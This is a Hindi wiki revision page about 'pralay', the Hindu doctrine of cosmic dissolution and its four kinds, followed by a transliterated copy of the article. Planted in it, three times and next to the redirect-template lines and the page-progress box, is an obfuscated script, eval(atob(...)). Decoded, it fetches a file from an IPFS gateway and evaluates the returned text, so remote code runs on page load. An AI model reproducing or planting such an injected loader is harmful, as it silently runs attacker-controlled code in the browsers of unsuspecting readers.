Difference between revisions of "प्रलय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "अर्थात " to "अर्थात् ")
 
Line 1: Line 1:
 
'''प्रलय''' का अर्थ होता है संसार का अपने मूल कारण प्रकृति में सर्वथा लीन हो जाना या [[ब्रह्माण्ड|भूखण्ड या ब्रह्माण्ड]] का मिट जाना, नष्ट हो जाना। प्रकृति का ब्रह्म में लय<ref>लीन</ref> हो जाना ही प्रलय है। यह संपूर्ण ब्रह्माण्ड ही प्रकृति कही गई है। इसे ही शक्ति कहते हैं।<ref name="pp">{{cite web |url=http://hindi.webdunia.com/sanatan-dharma-brahmand/holocaust-according-to-hinduism-112120700061_1.html|title=हिंदू धर्म : प्रलय के चार प्रकार जानिए|accessmonthday=8 मार्च|accessyear=2016|last= |first= |authorlink= |format= |publisher=Web Dunia|language=हिन्दी}}</ref><br />
 
'''प्रलय''' का अर्थ होता है संसार का अपने मूल कारण प्रकृति में सर्वथा लीन हो जाना या [[ब्रह्माण्ड|भूखण्ड या ब्रह्माण्ड]] का मिट जाना, नष्ट हो जाना। प्रकृति का ब्रह्म में लय<ref>लीन</ref> हो जाना ही प्रलय है। यह संपूर्ण ब्रह्माण्ड ही प्रकृति कही गई है। इसे ही शक्ति कहते हैं।<ref name="pp">{{cite web |url=http://hindi.webdunia.com/sanatan-dharma-brahmand/holocaust-according-to-hinduism-112120700061_1.html|title=हिंदू धर्म : प्रलय के चार प्रकार जानिए|accessmonthday=8 मार्च|accessyear=2016|last= |first= |authorlink= |format= |publisher=Web Dunia|language=हिन्दी}}</ref><br />
प्रलय चार प्रकार की होते है- पहला किसी भी धरती पर से जीवन का समाप्त हो जाना, दूसरा धरती का नष्ट होकर भस्म बन जाना, तीसरा [[सूर्य]] सहित ग्रह-नक्षत्रों का नष्ट होकर भस्मीभूत हो जाना और चौथा भस्म का ब्रह्म में लीन हो जाना अर्थात फिर भस्म भी नहीं रहे, पुन: शून्यावस्था में हो जाना।
+
प्रलय चार प्रकार की होते है- पहला किसी भी धरती पर से जीवन का समाप्त हो जाना, दूसरा धरती का नष्ट होकर भस्म बन जाना, तीसरा [[सूर्य]] सहित ग्रह-नक्षत्रों का नष्ट होकर भस्मीभूत हो जाना और चौथा भस्म का ब्रह्म में लीन हो जाना अर्थात् फिर भस्म भी नहीं रहे, पुन: शून्यावस्था में हो जाना।
 
[[हिन्दू]] [[शास्त्र|शास्त्रों]] में मूल रूप से प्रलय के चार प्रकार बताए गए हैं-  
 
[[हिन्दू]] [[शास्त्र|शास्त्रों]] में मूल रूप से प्रलय के चार प्रकार बताए गए हैं-  
 
#नित्य
 
#नित्य
Line 12: Line 12:
 
#प्राकृतिक प्रलय
 
#प्राकृतिक प्रलय
 
==नित्य प्रलय==  
 
==नित्य प्रलय==  
[[वेदांत]] के अनुसार जीवों की नित्य होती रहने वाली [[मृत्यु]] को नित्य प्रलय कहते हैं। जो जन्म लेते हैं, उनकी प्रतिदिन की मृत्यु अर्थात प्रतिपल सृष्टी में जन्म और मृत्य का चक्र चलता रहता है।
+
[[वेदांत]] के अनुसार जीवों की नित्य होती रहने वाली [[मृत्यु]] को नित्य प्रलय कहते हैं। जो जन्म लेते हैं, उनकी प्रतिदिन की मृत्यु अर्थात् प्रतिपल सृष्टी में जन्म और मृत्य का चक्र चलता रहता है।
 
==आत्यन्तिक प्रलय==
 
==आत्यन्तिक प्रलय==
आत्यन्तिक प्रलय योगीजनों के ज्ञान के द्वारा ब्रह्म में लीन हो जाने को कहते हैं। अर्थात [[मोक्ष]] प्राप्त कर उत्पत्ति और प्रलय चक्र से बाहर निकल जाना ही आत्यन्तिक प्रलय है।
+
आत्यन्तिक प्रलय योगीजनों के ज्ञान के द्वारा ब्रह्म में लीन हो जाने को कहते हैं। अर्थात् [[मोक्ष]] प्राप्त कर उत्पत्ति और प्रलय चक्र से बाहर निकल जाना ही आत्यन्तिक प्रलय है।
 
==नैमित्तिक प्रलय==
 
==नैमित्तिक प्रलय==
 
{{main|नैमित्तिक प्रलय}}
 
{{main|नैमित्तिक प्रलय}}

Latest revision as of 07:55, 7 November 2017

pralay ka arth hota hai sansar ka apane mool karan prakriti mean sarvatha lin ho jana ya bhookhand ya brahmand ka mit jana, nasht ho jana. prakriti ka brahm mean lay[1] ho jana hi pralay hai. yah sanpoorn brahmand hi prakriti kahi gee hai. ise hi shakti kahate haian.[2]
pralay char prakar ki hote hai- pahala kisi bhi dharati par se jivan ka samapt ho jana, doosara dharati ka nasht hokar bhasm ban jana, tisara soory sahit grah-nakshatroan ka nasht hokar bhasmibhoot ho jana aur chautha bhasm ka brahm mean lin ho jana arthath phir bhasm bhi nahian rahe, pun: shoonyavastha mean ho jana. hindoo shastroan mean mool roop se pralay ke char prakar batae ge haian-

  1. nity
  2. naimittik
  3. dviparth
  4. prakrit

pauranik ganana ke anusar yah kram hai-

  1. nity
  2. naimittak
  3. atyantik
  4. prakritik pralay

nity pralay

vedaant ke anusar jivoan ki nity hoti rahane vali mrityu ko nity pralay kahate haian. jo janm lete haian, unaki pratidin ki mrityu arthath pratipal srishti mean janm aur mrity ka chakr chalata rahata hai.

atyantik pralay

atyantik pralay yogijanoan ke jnan ke dvara brahm mean lin ho jane ko kahate haian. arthath moksh prapt kar utpatti aur pralay chakr se bahar nikal jana hi atyantik pralay hai.

naimittik pralay

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vedaant ke anusar pratyek kalp ke aant mean hone vala tinoan lokoan ka kshay ya poorn vinash ho jana naimittik pralay kahalata hai.

prakrit pralay

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

brahmaand ke sabhi bhookhand ya brahmand ka mit jana, nasht ho jana ya bhasmaroop ho jana prakrit pralay kahalata hai. name="pp"/>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. lin
  2. hiandoo dharm : pralay ke char prakar janie (hindi) Web Dunia. abhigaman tithi: 8 march, 2016.

bahari k diyaan

sanbandhit lekh